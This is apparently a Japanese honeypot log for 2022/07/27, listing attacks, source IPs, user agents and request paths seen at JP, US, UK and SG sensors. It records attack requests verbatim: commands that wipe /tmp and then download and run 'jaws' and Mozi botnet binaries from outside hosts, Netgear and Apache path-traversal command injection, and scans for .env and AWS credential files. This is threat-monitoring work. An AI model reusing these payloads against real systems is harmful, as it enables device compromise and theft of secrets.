ハニーポット(仮) 観測記録 2022/07/27分です。
特徴
共通
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
Location:JP
NetGear製品の脆弱性を狙うアクセス
.jsへのスキャン行為
/.gitへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget qwugdsabbdsdeeeeb212c.bydthkk.top/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget rischyo.cf/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget 7.7.7.7/jaws; sh /tmp/jaws
Location:US
.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。
Location:UK
D-link製品の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
/.gitへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget qwugdsabbdsdeeeeb212c.bydthkk.top/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget networkmapping.xyz/jaws; sh /tmp/jaws
Location:SG
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。
他
アクセス数推移
JP:総アクセス数:88 (前日比:-279)
US:総アクセス数:236 (前日比:-142)
UK:総アクセス数:181 (前日比:134)
SG:総アクセス数:123 (前日比:60)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 3.145.4.190 | United States |
1 | 27.215.178.119 | China |
1 | 42.202.103.147 | China |
1 | 42.237.24.91 | China |
8 | 52.23.226.134 | United States |
1 | 95.161.131.235 | Antigua and Barbuda |
16 | 95.214.235.205 | Ukraine |
1 | 103.60.60.186 | Singapore |
1 | 107.182.129.137 | United States |
1 | 108.170.31.55 | United States |
2 | 109.237.103.9 | Russia |
10 | 135.125.217.54 | France |
7 | 135.125.244.48 | France |
2 | 143.92.32.136 | Singapore |
2 | 143.92.32.144 | Singapore |
1 | 143.92.32.148 | Singapore |
1 | 143.92.32.170 | Singapore |
3 | 163.123.143.71 | United States |
1 | 172.104.138.223 | United States |
4 | 178.62.52.193 | United States |
1 | 183.90.187.27 | Hong Kong |
14 | 185.7.214.104 | Hong Kong |
2 | 185.162.235.157 | Russia |
1 | 193.142.59.214 | Germany |
1 | 201.150.182.185 | Bolivia |
1 | 205.210.31.143 | United States |
1 | 210.209.225.174 | Taiwan |
1 | 212.23.222.167 | Poland |
1 | 212.103.61.71 | Germany |
UserAgent一覧
件数 | UserAgent |
---|---|
13 | - |
3 | Go-http-client/1.1 |
1 | Hello, world |
2 | Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36 |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
4 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 |
6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 |
14 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 |
37 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
4 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 zgrab/0.x |
1 | python-requests/2.22.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
2 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ |
HTTP/1.0 | |
1 | \x16\x03\x01\x01D\x01 |
||
6 | \x16\x03\x01 |
||
1 | GET | /../../mnt/mtd/Config/Account1 |
HTTP/1.1 |
38 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /99vt |
HTTP/1.1 |
1 | GET | /99vu |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /Public/home/js/check.js |
HTTP/1.1 |
2 | GET | /_ignition/execute-solution |
HTTP/1.1 |
2 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /fuN3 |
HTTP/1.0 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
6 | GET | /map/baidumap.xml |
HTTP/1.1 |
3 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//27[.]215[.]178[.]119:38367/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//42[.]202[.]103[.]147:41013/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ qwugdsabbdsdeeeeb212c.bydthkk.top/jaws;sh+/tmp/jaws |
|
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ rischyo.cf/jaws;sh+/tmp/jaws |
|
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+7[.]7[.]7[.]7/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /static/admin/javascript/hetong.js |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
4 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
2 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 3.22.235.38 | United States |
1 | 14.224.163.63 | Vietnam |
87 | 18.231.198.221 | United States |
87 | 43.200.191.239 | United States |
8 | 46.249.32.126 | Netherlands |
9 | 51.79.29.48 | Canada |
2 | 52.12.1.57 | United States |
1 | 95.161.131.235 | Antigua and Barbuda |
1 | 107.182.129.137 | United States |
2 | 109.237.103.9 | Russia |
4 | 134.122.135.64 | Singapore |
1 | 137.184.88.136 | United States |
1 | 143.92.32.36 | Singapore |
2 | 143.92.32.46 | Singapore |
1 | 143.198.129.219 | United States |
1 | 162.142.125.7 | United States |
1 | 162.142.125.222 | United States |
2 | 163.123.143.71 | United States |
2 | 165.232.141.181 | United States |
1 | 181.214.206.161 | United States |
11 | 185.7.214.104 | Hong Kong |
6 | 185.254.196.223 | Ukraine |
1 | 192.241.219.116 | United States |
2 | 194.165.16.11 | Panama |
1 | 205.210.31.18 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
15 | - |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 |
174 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246 |
7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
22 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 zgrab/0.x |
1 | python-requests/2.22.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_34.68.118.83_80\n |
||
2 | \x03 |
||
1 | \x16\x03\x01\x01D\x01 |
||
1 | \x16\x03\x01 |
||
1 | GET | /../../mnt/mtd/Config/Account1 |
HTTP/1.1 |
2 | GET | /.aws/credentials |
HTTP/1.1 |
2 | GET | /.config/gatsby/config.json |
HTTP/1.1 |
2 | GET | /.cordova/config.json |
HTTP/1.1 |
2 | GET | /.deployment-config.json |
HTTP/1.1 |
2 | GET | /.docker/.env |
HTTP/1.1 |
2 | GET | /.docker/config.json |
HTTP/1.1 |
2 | GET | /.docker/daemon.json |
HTTP/1.1 |
2 | GET | /.docker/laravel/app/.env |
HTTP/1.1 |
2 | GET | /.env.backup |
HTTP/1.1 |
2 | GET | /.env.bak |
HTTP/1.1 |
2 | GET | /.env.dev |
HTTP/1.1 |
2 | GET | /.env.development.local |
HTTP/1.1 |
2 | GET | /.env.dist |
HTTP/1.1 |
2 | GET | /.env.docker.dev |
HTTP/1.1 |
2 | GET | /.env.local |
HTTP/1.1 |
2 | GET | /.env.php |
HTTP/1.1 |
2 | GET | /.env.prod |
HTTP/1.1 |
2 | GET | /.env.production.local |
HTTP/1.1 |
2 | GET | /.env.sample.php |
HTTP/1.1 |
2 | GET | /.env.save |
HTTP/1.1 |
2 | GET | /.env.stage |
HTTP/1.1 |
2 | GET | /.env.test.localapi/.env |
HTTP/1.1 |
2 | GET | /.env.test |
HTTP/1.1 |
24 | GET | /.env |
HTTP/1.1 |
2 | GET | /.environment |
HTTP/1.1 |
2 | GET | /.envrc |
HTTP/1.1 |
2 | GET | /.envs |
HTTP/1.1 |
2 | GET | /.env~ |
HTTP/1.1 |
1 | GET | /.git/config |
HTTP/1.1 |
2 | GET | /.gitlab-ci/.env |
HTTP/1.1 |
2 | GET | /.jupyter/jupyter_notebook_config.json |
HTTP/1.1 |
2 | GET | /.lanproxy/config.json |
HTTP/1.1 |
2 | GET | /.msmtprc |
HTTP/1.1 |
2 | GET | /.s3cfg |
HTTP/1.1 |
2 | GET | /.vscode/.env |
HTTP/1.1 |
1 | GET | //PMA/scripts/setup.php |
HTTP/1.1 |
1 | GET | //admin/scripts/setup.php |
HTTP/1.1 |
1 | GET | //dbadmin/scripts/setup.php |
HTTP/1.1 |
1 | GET | //mysql/scripts/setup.php |
HTTP/1.1 |
1 | GET | //phpMyAdmin/scripts/setup.php |
HTTP/1.1 |
1 | GET | //phpmyadmin/scripts/setup.php |
HTTP/1.1 |
1 | GET | //webdav/wickd.php |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
2 | GET | /_profiler/phpinfo |
HTTP/1.1 |
2 | GET | /_wpeprivate/config.json |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
2 | GET | /admin/.env |
HTTP/1.1 |
2 | GET | /app/config.yml |
HTTP/1.1 |
2 | GET | /app/config/parameters.yml |
HTTP/1.1 |
2 | GET | /asdf.php |
HTTP/1.1 |
2 | GET | /beta/.env |
HTTP/1.1 |
2 | GET | /config.env |
HTTP/1.1 |
2 | GET | /config.js |
HTTP/1.1 |
2 | GET | /config.json |
HTTP/1.1 |
2 | GET | /config/config.js |
HTTP/1.1 |
2 | GET | /config/config.json |
HTTP/1.1 |
2 | GET | /config/secrets.yml |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
2 | GET | /console/base/config.json |
HTTP/1.1 |
2 | GET | /console/payments/config.json |
HTTP/1.1 |
2 | GET | /dashboard/phpinfo.php |
HTTP/1.1 |
2 | GET | /database.yml |
HTTP/1.1 |
2 | GET | /debug/default/view?panel=config |
HTTP/1.1 |
2 | GET | /env.backup |
HTTP/1.1 |
2 | GET | /env.config.js |
HTTP/1.1 |
2 | GET | /env.js |
HTTP/1.1 |
2 | GET | /frontend_dev.php/$ |
HTTP/1.1 |
2 | GET | /i.php |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
2 | GET | /info.json |
HTTP/1.1 |
2 | GET | /info.php |
HTTP/1.1 |
2 | GET | /infophp.php |
HTTP/1.1 |
2 | GET | /infos.php |
HTTP/1.1 |
2 | GET | /js/config.js |
HTTP/1.1 |
2 | GET | /js/envConfig.js |
HTTP/1.1 |
2 | GET | /kyc/.env |
HTTP/1.1 |
2 | GET | /laravel/.env |
HTTP/1.1 |
2 | GET | /laravel/core/.env |
HTTP/1.1 |
2 | GET | /linusadmin-phpinfo.php |
HTTP/1.1 |
2 | GET | /mailer/.env |
HTTP/1.1 |
7 | GET | /map/baidumap.xml |
HTTP/1.1 |
1 | GET | /muieblackcat |
HTTP/1.1 |
2 | GET | /old_phpinfo.php |
HTTP/1.1 |
2 | GET | /php-info.php |
HTTP/1.1 |
2 | GET | /php.ini |
HTTP/1.1 |
2 | GET | /php.php |
HTTP/1.1 |
2 | GET | /phpinfo.php |
HTTP/1.1 |
2 | GET | /phpinfo |
HTTP/1.1 |
2 | GET | /phpversion.php |
HTTP/1.1 |
2 | GET | /pinfo.php |
HTTP/1.1 |
2 | GET | /prod/.env |
HTTP/1.1 |
2 | GET | /public/.env |
HTTP/1.1 |
2 | GET | /secrets.yml |
HTTP/1.1 |
2 | GET | /server/config.json |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
2 | GET | /temp.php |
HTTP/1.1 |
2 | GET | /test.php |
HTTP/1.1 |
2 | GET | /time.php |
HTTP/1.1 |
2 | GET | /twitter/.env |
HTTP/1.1 |
2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | GET | /wp-config.php-backup |
HTTP/1.1 |
2 | GET | /wp-config.php.bak |
HTTP/1.1 |
2 | GET | /wp-config.php.old |
HTTP/1.1 |
1 | OPTIONS | / |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
3 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
2 | 20.14.97.133 | United States |
1 | 20.79.248.176 | United States |
1 | 20.187.116.218 | United States |
1 | 61.52.54.178 | China |
2 | 62.171.159.235 | Germany |
1 | 64.62.197.43 | United States |
4 | 71.6.167.142 | United States |
1 | 77.83.36.23 | Ukraine |
2 | 80.66.88.211 | Russia |
1 | 95.161.131.235 | Antigua and Barbuda |
2 | 109.237.103.9 | Russia |
2 | 109.237.103.123 | Russia |
1 | 112.164.204.29 | South Korea |
1 | 117.210.153.60 | India |
1 | 120.83.73.174 | China |
1 | 125.41.6.53 | China |
3 | 143.92.32.144 | Singapore |
2 | 143.92.32.170 | Singapore |
2 | 143.92.35.7 | Singapore |
3 | 163.123.143.71 | United States |
1 | 167.94.138.60 | United States |
1 | 181.214.206.161 | United States |
14 | 185.7.214.104 | Hong Kong |
125 | 188.241.156.154 | United Kingdom |
1 | 199.101.170.12 | Canada |
1 | 205.210.31.142 | United States |
4 | 207.154.225.183 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
20 | - |
3 | Go-http-client/1.1 |
1 | Hello, world |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 |
7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 |
14 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
126 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 |
3 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
2 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | SSH-2.0-libssh2_1.9.0 |
||
2 | \x03 |
||
2 | \x16\x03\x01\x01D\x01 |
||
1 | \x16\x03\x01\x02 |
||
2 | \x16\x03\x01 |
||
1 | CONNECT | www[.]google[.]com:443 |
HTTP/1.1 |
1 | GET | /../../mnt/mtd/Config/Account1 |
HTTP/1.1 |
3 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /.well-known/security.txt |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
2 | GET | /_ignition/execute-solution |
HTTP/1.1 |
2 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /admin/.git/config |
HTTP/1.1 |
2 | GET | /admin/ |
HTTP/1.1 |
1 | GET | /admin/config |
HTTP/1.1 |
1 | GET | /api/.git/config |
HTTP/1.1 |
1 | GET | /api/ |
HTTP/1.1 |
1 | GET | /api/config |
HTTP/1.1 |
1 | GET | /api |
HTTP/1.1 |
1 | GET | /app/.git/config |
HTTP/1.1 |
1 | GET | /app/ |
HTTP/1.1 |
1 | GET | /app/config |
HTTP/1.1 |
1 | GET | /app |
HTTP/1.1 |
1 | GET | /backend/.git/config |
HTTP/1.1 |
1 | GET | /backend/ |
HTTP/1.1 |
1 | GET | /backend/config |
HTTP/1.1 |
1 | GET | /backend |
HTTP/1.1 |
1 | GET | /backup/.git/config |
HTTP/1.1 |
1 | GET | /backup/ |
HTTP/1.1 |
1 | GET | /backup/config |
HTTP/1.1 |
1 | GET | /backup |
HTTP/1.1 |
1 | GET | /bak/.git/config |
HTTP/1.1 |
1 | GET | /bak/ |
HTTP/1.1 |
1 | GET | /bak/config |
HTTP/1.1 |
1 | GET | /bak |
HTTP/1.1 |
1 | GET | /cfg/.git/config |
HTTP/1.1 |
1 | GET | /cfg/ |
HTTP/1.1 |
1 | GET | /cfg/config |
HTTP/1.1 |
1 | GET | /cfg |
HTTP/1.1 |
1 | GET | /conf/.git/config |
HTTP/1.1 |
1 | GET | /conf/ |
HTTP/1.1 |
1 | GET | /conf/config |
HTTP/1.1 |
1 | GET | /conf |
HTTP/1.1 |
1 | GET | /config/.git/config |
HTTP/1.1 |
1 | GET | /config/ |
HTTP/1.1 |
1 | GET | /config/config |
HTTP/1.1 |
2 | GET | /config |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /cron/ |
HTTP/1.1 |
1 | GET | /cron |
HTTP/1.1 |
1 | GET | /data/.git/config |
HTTP/1.1 |
1 | GET | /data/ |
HTTP/1.1 |
1 | GET | /data/config |
HTTP/1.1 |
1 | GET | /data |
HTTP/1.1 |
1 | GET | /download/ |
HTTP/1.1 |
1 | GET | /download |
HTTP/1.1 |
1 | GET | /downloads/ |
HTTP/1.1 |
1 | GET | /downloads |
HTTP/1.1 |
3 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /files/ |
HTTP/1.1 |
1 | GET | /files |
HTTP/1.1 |
1 | GET | /git/.git/config |
HTTP/1.1 |
1 | GET | /git/ |
HTTP/1.1 |
1 | GET | /git/config |
HTTP/1.1 |
1 | GET | /git |
HTTP/1.1 |
1 | GET | /inc/.git/config |
HTTP/1.1 |
1 | GET | /inc/ |
HTTP/1.1 |
1 | GET | /inc/config |
HTTP/1.1 |
1 | GET | /inc |
HTTP/1.1 |
1 | GET | /include/.git/config |
HTTP/1.1 |
1 | GET | /include/ |
HTTP/1.1 |
1 | GET | /include/config |
HTTP/1.1 |
1 | GET | /include |
HTTP/1.1 |
1 | GET | /includes/.git/config |
HTTP/1.1 |
1 | GET | /includes/ |
HTTP/1.1 |
1 | GET | /includes/config |
HTTP/1.1 |
1 | GET | /includes |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /lib/.git/config |
HTTP/1.1 |
1 | GET | /lib/ |
HTTP/1.1 |
1 | GET | /lib/config |
HTTP/1.1 |
1 | GET | /lib |
HTTP/1.1 |
1 | GET | /libs/.git/config |
HTTP/1.1 |
1 | GET | /libs/ |
HTTP/1.1 |
1 | GET | /libs/config |
HTTP/1.1 |
1 | GET | /libs |
HTTP/1.1 |
1 | GET | /log/ |
HTTP/1.1 |
1 | GET | /log |
HTTP/1.1 |
1 | GET | /logs/ |
HTTP/1.1 |
1 | GET | /logs |
HTTP/1.1 |
7 | GET | /map/baidumap.xml |
HTTP/1.1 |
1 | GET | /phpMyAdmin/index.php |
HTTP/1.1 |
1 | GET | /phpmyadmin/index.php |
HTTP/1.1 |
1 | GET | /rest/.git/config |
HTTP/1.1 |
1 | GET | /rest/ |
HTTP/1.1 |
1 | GET | /rest/config |
HTTP/1.1 |
1 | GET | /rest |
HTTP/1.1 |
2 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /service/.git/config |
HTTP/1.1 |
1 | GET | /service/ |
HTTP/1.1 |
1 | GET | /service/config |
HTTP/1.1 |
1 | GET | /service |
HTTP/1.1 |
1 | GET | /services/.git/config |
HTTP/1.1 |
1 | GET | /services/ |
HTTP/1.1 |
1 | GET | /services/config |
HTTP/1.1 |
1 | GET | /services |
HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//120[.]83[.]73[.]174:57499/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ qwugdsabbdsdeeeeb212c.bydthkk.top/jaws;sh+/tmp/jaws |
|
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+networkmapping[.]xyz/jaws;sh+/tmp/jaws |
HTTP/1.1 |
2 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /source/.git/config |
HTTP/1.1 |
1 | GET | /source/ |
HTTP/1.1 |
1 | GET | /source/config |
HTTP/1.1 |
1 | GET | /source |
HTTP/1.1 |
1 | GET | /sources/.git/config |
HTTP/1.1 |
1 | GET | /sources/ |
HTTP/1.1 |
1 | GET | /sources/config |
HTTP/1.1 |
1 | GET | /sources |
HTTP/1.1 |
1 | GET | /src/.git/config |
HTTP/1.1 |
1 | GET | /src/ |
HTTP/1.1 |
1 | GET | /src/config |
HTTP/1.1 |
1 | GET | /src |
HTTP/1.1 |
1 | GET | /svc/.git/config |
HTTP/1.1 |
1 | GET | /svc/ |
HTTP/1.1 |
1 | GET | /svc/config |
HTTP/1.1 |
1 | GET | /svc |
HTTP/1.1 |
1 | GET | /temp/.git/config |
HTTP/1.1 |
1 | GET | /temp/ |
HTTP/1.1 |
1 | GET | /temp/config |
HTTP/1.1 |
1 | GET | /temp |
HTTP/1.1 |
1 | GET | /test/.git/config |
HTTP/1.1 |
1 | GET | /test/ |
HTTP/1.1 |
1 | GET | /test/config |
HTTP/1.1 |
1 | GET | /test |
HTTP/1.1 |
1 | GET | /tmp/.git/config |
HTTP/1.1 |
1 | GET | /tmp/ |
HTTP/1.1 |
1 | GET | /tmp/config |
HTTP/1.1 |
1 | GET | /tmp |
HTTP/1.1 |
1 | GET | /upload/ |
HTTP/1.1 |
1 | GET | /upload |
HTTP/1.1 |
1 | GET | /uploads/ |
HTTP/1.1 |
1 | GET | /uploads |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | /wallet/ |
HTTP/1.1 |
1 | GET | /wallet |
HTTP/1.1 |
1 | GET | /wallets/ |
HTTP/1.1 |
1 | GET | /wallets |
HTTP/1.1 |
1 | OPTIONS | / |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
3 | POST | /HNAP1/ |
HTTP/1.0 |
3 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
2 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | PRI | * |
HTTP/2.0 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
42 | 20.127.188.34 | United States |
1 | 20.199.114.17 | United States |
12 | 51.79.29.48 | Canada |
3 | 51.89.199.116 | France |
2 | 51.195.39.40 | France |
1 | 51.195.187.154 | France |
1 | 60.188.209.137 | China |
1 | 95.161.131.235 | Antigua and Barbuda |
2 | 101.200.79.217 | China |
2 | 102.67.226.28 | Ivory Coast |
1 | 108.170.31.55 | United States |
2 | 109.237.103.9 | Russia |
1 | 124.64.218.208 | China |
3 | 134.122.132.6 | Singapore |
1 | 137.184.33.230 | United States |
1 | 143.92.35.7 | Singapore |
1 | 143.198.129.219 | United States |
1 | 147.182.255.203 | United States |
2 | 162.142.125.10 | United States |
3 | 163.123.143.71 | United States |
1 | 167.94.138.47 | United States |
1 | 167.94.138.62 | United States |
1 | 172.104.138.223 | United States |
4 | 178.62.52.193 | United States |
13 | 185.7.214.104 | Hong Kong |
8 | 185.254.196.223 | Ukraine |
1 | 192.241.206.164 | United States |
1 | 193.56.29.120 | United Kingdom |
2 | 194.165.16.72 | Panama |
1 | 198.235.24.151 | United States |
1 | 202.84.44.227 | Bangladesh |
1 | 205.210.31.25 | United States |
5 | 216.83.53.34 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
13 | - |
3 | Go-http-client/1.1 |
1 | Hello, World |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 |
9 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 |
13 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 |
1 | Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 920) like Gecko |
72 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 zgrab/0.x |
